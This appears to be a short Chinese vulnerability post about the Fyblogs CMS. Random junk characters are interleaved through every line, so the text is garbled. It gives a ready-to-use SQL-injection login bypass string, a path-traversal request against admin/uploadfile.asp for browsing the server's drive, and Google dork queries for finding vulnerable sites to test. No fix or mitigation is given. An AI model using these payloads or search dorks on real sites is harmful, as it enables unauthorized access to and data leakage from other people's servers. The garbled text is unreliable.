漏洞类型: 未授权访问/权限绕过# \7 g) M8 @1 q) S5 o. _3 r( t7 m
' P2 c5 [+ u$ H6 r! ]7 {
简要描述:
' F- \4 w% b0 \- B3 D6 R& y3 w* n0 ~, h/ A3 G9 u# v( h1 Y- J
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
5 K# K; U; V5 Y; Q! s7 I9 R- k4 K q4 H* U( [& m' l7 R: Y
详细说明:
# G9 p4 Z8 O. {, @4 {6 J0 {
7 c! d% G5 g. Q0 j/ \' C) U, V后台万能密码 'or'='or'$ p* X% _6 T0 e6 H5 R: M
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
, m1 b h, W/ `9 radmin/uploadfile.asp?currentFolder=/upfiles/../
6 S6 D" C7 }' S9 Z" {
2 y3 ?7 m8 {2 j6 S漏洞证明:
& D' p% x. G- c$ w3 @" Y0 q) N( V; ~# k: d3 {2 B1 P" [ o
谷歌:inurl:type.asp?id=1 新闻中心
# u* N' s( B6 g2 _或者 :inurl:download_ok.asp?
. R5 a6 H" \. B
/ g- g: g) w7 G8 }+ o. {可以测试: x; l0 }7 s7 {( `; |
/ u8 _! _4 c( W2 T. m
, O3 {1 t+ ^9 y
|